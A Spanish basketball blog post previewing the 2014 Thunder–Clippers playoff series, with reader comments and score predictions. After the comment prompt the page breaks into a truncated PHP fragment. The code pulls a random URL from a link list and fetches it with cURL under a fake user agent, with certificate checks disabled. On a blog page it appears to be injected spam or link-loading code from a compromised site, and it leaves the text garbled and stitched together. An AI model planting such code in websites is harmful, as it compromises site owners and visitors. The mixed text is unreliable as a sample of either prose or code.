PO 2014: Previa Oklahoma City Thunder – L.A. Clippers

05 de May de 2014 por TheDeerHunter

kd griffin

Siguiente nivel, más dificultad. Nuevo cruce infernal en el camino de espinas que el cuadro del Oeste. Confieso que ésta era la final de conferencia por la que habría apostado a principio de curso. Máxima igualdad. Similares filosofías y ambos llegan con trayectorias calcadas, tanto en la regular como en la reciente primera ronda. Empate a dos también en los precedentes. Oh, vaya… se avecina otra serie a 7 partidos. Probablemente la más complicada de las semifinales de conferencia.

Una de las diferencias que puede marcar la manera con la que unos y otros pueden afrontar la eliminatoria ha sido la naturaleza de sus anteriores rivales, ambos inferiores sobre el papel. Los Thunder se han complicado la vida no sabiendo controlar al segundo equipo menos ofensivo del Oeste, los Clippers se la complicaron jugándosela a pecho descubierto contra la dinamita de Curry y compañía. Los primeros no pueden permitirse que sus rivales sitúen los partidos por encima de los 110 puntos y los segundos no pueden cometer la locura de plantear la batalla a campo abierto, donde los contragolpes de Westbrook y Durant son imparables. Hubo un tiempo en el que se decía que en Playoffs se imponía el ritmo bajo y la defensa. Ni lo hemos visto hasta ahora en el Oeste ni lo vamos a ver en esta serie. A preparar las palomitas.

Claves de la eliminatoria:

  • ¡Sielos, no tenemos a Tony Allen! Ambos equipos tienen recursos defensivos específicos de alto nivel, sin embargo los Clippers no cuentan con un antídoto contra el mejor anotador del mundo. Barnes no es suficiente, Granger o Turkoglu ni de lejos. Durant además viene picado y entrenado. Rivers optó en sus victorias de temporada por dejarle hacer, tratando de neutralizar al resto. Además, es célebre por ser capaz de inventar contramedidas sobre la marcha. Que se lo pregunten a LeBron.
  • cp westbrookCrawford y la segunda oleada: En teoría, Clippers tienen un fondo de armario significativamente superior a sus rivales. En Playoffs no se suele abusar de los suplentes y en primera ronda no llegó a funcionar bien, pero es de esperar que en algún momento espabilen. Es ahora o nunca.
  • El tercer hombre: Ya lo pasaron mal los Thunder en primera ronda con la anotación exclusiva de su dúo estelar. Ibaka bajó sus prestaciones en ese sentido, muy centrado en parar a Randolph. Sobrevivieron gracias al paso adelante de Jackson y Butler en los momentos clave. Contra una exigencia ofensiva mayor, necesitarán mayor aportación de la intendencia. Sólo con Durant y Westbrook no tumbarán a los Clippers.
  • El doctorado de Griffin: Llega el momento de la verdad. Mr. Dunk ha protagonizado uno de los debates del curso. No le basta con haber dado un paso adelante hasta la fecha.  Ante un intimidador temible como Ibaka le exigimos ser tan determinante como hasta ahora.  Los grandes jugadores son los que se crecen ante las peores dificultades. Griffin aún debe demostrar que lo es.

Pronóstico: 7 partidos… la ventaja campo se hace valer y los Thunder son especialistas en ello. Preveo muchos tiros libres en tal situación. 4-3 para ellos.

Comenta

6 comentarios a esta entrada

  1. Lucho dice:
    #1

    Thunder 4-1 para mi

      Citar

  2. Esteban dice:
    #2

    voy con el Thunder tambien, pero su deslucida serie contra Menphis, me hace dudar un poco

      Citar

  3. Denise dice:
    #3

    1-4 para Clippers. El único duelo en el que ganan los Thunder es en el de Durant,, que es demasiado bueno y más alllá de Barnes, los Clippers no tienen a un defensor de entidad. Pero los demás duelos, se los lleva Clippers de calle, a los que veo como maximos favoritos al anillo solo por detras de Indiana (si es capaz de recuperarse de sus lios internos)
    En el perimetro, Paul puede controlar dentro de lo que cabe a Westbrook, Sefolosha, who’s Sefolosha?, desde el banco Jackson, Lamb y Butler pueden aportar pero ante los Clippers será insuficiente y el banquillo de OKC es de chiste si lo comparamos con el de Clippers. Y en la pintura, Ibaka está demasiado solo en ataque y encima gastará bastante energía atrás teniendo que defender a Griffin, y el rookie Adams me gusta para el futuro pero aun está demasiado verde para estas situaciones.
    Le doy un 1-4 para Clippers, la unicas posibilidades que veo a OKC de vencer a los angelinos es que el caso Sterling siga en auge y se le de mas repercusion descentrando a los jugadores, ó que Durant se vaya a los 45 PPG con buenos %, y que Westbrook se coma a Paul, de lo contrario vamos a ver marcadores altisimos y partidos que se irán decidiendo para el cuadro angelino a mediados del 3er cuarto cuando KD y RW se vayan quedando sin gasolina.

      Citar

  4. rumbero dice:
    #4

    A mi me huele a serie larga. Aunque Clippers sea más equipo, Durant y Westbrook aun estando sólos ganan partidos. Clave el duelo Paul – Westbrook y lo que plantee Brooks para minimizar el daño de los interiores teniendo en cuenta que a Oklahoma le gusta jugar sólo con Ibaka por dentro. Perkins time.

      Citar

  5. Lucho dice:
    #5

    Paul 5/5 en 3P en el 1ºcuarto
    Es un escandalo

      Citar

  6. GreenPride dice:
    #6

    Serie increiblemente interesante. En principio los Clippers tienen mucho más equipo pero Thunder tiene dos superestrellas dispuestos a todo y en gran momento de forma. El problema es si tendrán suficiente ayuda ante un equipo con muchas armas y con un entrenador mucho mejor que el que tienen ellos (alguien lo duda?)
    Para mí las claves estarán en si Durant y Westbrook han de jugar 1×1 demasiadas veces y en si los Thunder apretaran suficiente en defensa para lanzarse a la carrera donde son realmente imparables. Si los de OKC hacen prevalecer su físico en defensa y consiguen correr creo que la serie será suya pero si se juega más en 5×5 no tienen nada que hacer.
    Me gustan más los Clippers pero no me atrevo a pronosticar contra el MVP. Clippers en 6 o Thunder en 7

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>